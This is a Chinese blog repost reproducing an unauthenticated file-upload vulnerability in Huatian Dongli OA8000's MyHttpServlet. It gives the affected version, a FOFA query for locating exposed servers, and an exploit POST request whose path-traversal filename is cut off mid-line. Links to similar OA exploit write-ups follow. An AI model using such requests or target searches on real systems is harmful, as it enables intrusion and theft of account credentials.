华天动力-OA8000 MyHttpServlet 文件上传漏洞复现

9月前作者：OidBoy_G 分类：Toy博客阅读(41) 违法举报

这篇具有很好参考价值的文章主要介绍了华天动力-OA8000 MyHttpServlet 文件上传漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

华天动力OA是一款将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。

0x02 漏洞概述

华天动力OA MyHttpServlet 存在任意文件上传漏洞，未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句，获取用户账号密码等敏感信息。

0x03 影响范围

OA8000平台版 DLHT-OA8000-3-0-7.2-3-1-0-500

0x04 复现环境

FOFA：app="华天动力-OA8000"

华天动力oa漏洞,漏洞复现,安全,web安全

0x05 漏洞复现

exp:文章来源地址https://www.toymoban.com/news/detail-807540.html

POST /OAapp/MyHttpServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=9b0af0d79eaea67c3aa1889b0b43a50a
Accept-Encoding: gzip
Content-Length: 2428

--9b0af0d79eaea67c3aa1889b0b43a50a
Content-Disposition: form-data; name="file"; filename="\\Temp\\../../../report/reportFiles/d4f0fE.

到了这里，关于华天动力-OA8000 MyHttpServlet 文件上传漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞

通达OA get_file.php文件存在任意文件下载漏洞，攻击者通过漏洞可以读取服务器敏感文件。 ● 通达OA2011 ● hunter app.name=\\\"通达 OA\\\" ● 特征

2024年02月21日
浏览(60)
致远OA文件上传漏洞(含批量检测POC)

文章内容仅供学习参考请勿用于非法用途漏洞描述漏洞影响致远OA A6、A8、A8N (V8.0SP2，V8.1，V8.1SP1) 致远OA G6、G6N (V8.1、V8.1SP1) 网络测绘 app=“致远互联-OA” title=“V8.0SP2” 批量检测POC 漏洞描述致远OA是一套办公协同管理软件。近日，奇安信CERT监测到致远OA的相关漏洞信息。由

2024年02月08日
浏览(45)
ActiveMQ 任意文件上传漏洞复现

访问 http://ip:8161/admin/ 进入admin登陆页面，使用弱口令登陆，账号密码皆为 admin，登陆成功后，headers中会出现验证信息如： Authorization: Basic YWRtaW46YWRtaW4= 访问任意页面并抓包，注意headers中的验证信息将GET协议修改为PUT协议，将文件上传至 fileserver 目录下如上

2024年04月16日
浏览(49)
Dcat Admin文件上传漏洞复现

Dcat Admin是一个基于laravel-admin二次开发而成的后台系统构建工具，只需极少的代码即可快速构建出一个功能完善的高颜值后台系统。支持页面一键生成CURD代码，内置丰富的后台常用组件，开箱即用，让开发者告别冗杂的HTML代码，对后端开发者非常友好。借鉴了大佬文章：漏

2024年02月05日
浏览(40)
【漏洞复现-通达OA】通达OA share身份认证绕过漏洞

通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞，利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器

2024年02月19日
浏览(42)
OfficeWeb365 SaveDraw 文件上传漏洞复现

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务，包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览，WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。 OfficeWeb365 SaveDraw接口处存在文件上传漏洞，攻击者可通过该漏洞直接

2024年02月03日
浏览(39)
易思智能物流无人值守系统文件上传漏洞复现

易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业，帮助企业实现无人值守的智能物流运营，提高效率、降低成本，为现代物流行业带来新的发展机遇。易思无人值

2024年02月12日
浏览(40)
奇安信天擎 rptsvr 任意文件上传漏洞复现

奇安信天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统（简称“天擎”）产品。通过“体系化防御、数字化运营”方法，帮助政企客户准确识别、保护和监管终端，并确保这些终端在任何时候都能可信、安全、合规地访问数据和业务。天擎基于

2024年01月19日
浏览(39)
Weblogic 任意文件上传漏洞（CVE-2018-2894）复现

目录 weblogic 漏洞环境准备漏洞复现修复建议 WebLogic 是美国Oracle公司出品的一个 application server ，确切的说是一个基于 JAVAEE 架构的中间件， WebLogic 是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java应用服务器。将 Java 的动态功能和

2024年02月01日
浏览(46)
一文了解Tomcat/8.5.19文件上传漏洞复现

这里的用的是自己搭建的环境靶机因为这道实验题默认的为80端口是拒绝访问的所以我们可以尝试用下nmap进行简单的扫描这里也可以看到只开放了22，3389，8080端口，众所周知22是ssh，3389是远程连接，我们直接访问8080代理端口这里我们可以尝试下点击一下Manager App 拒绝

2024年02月16日
浏览(36)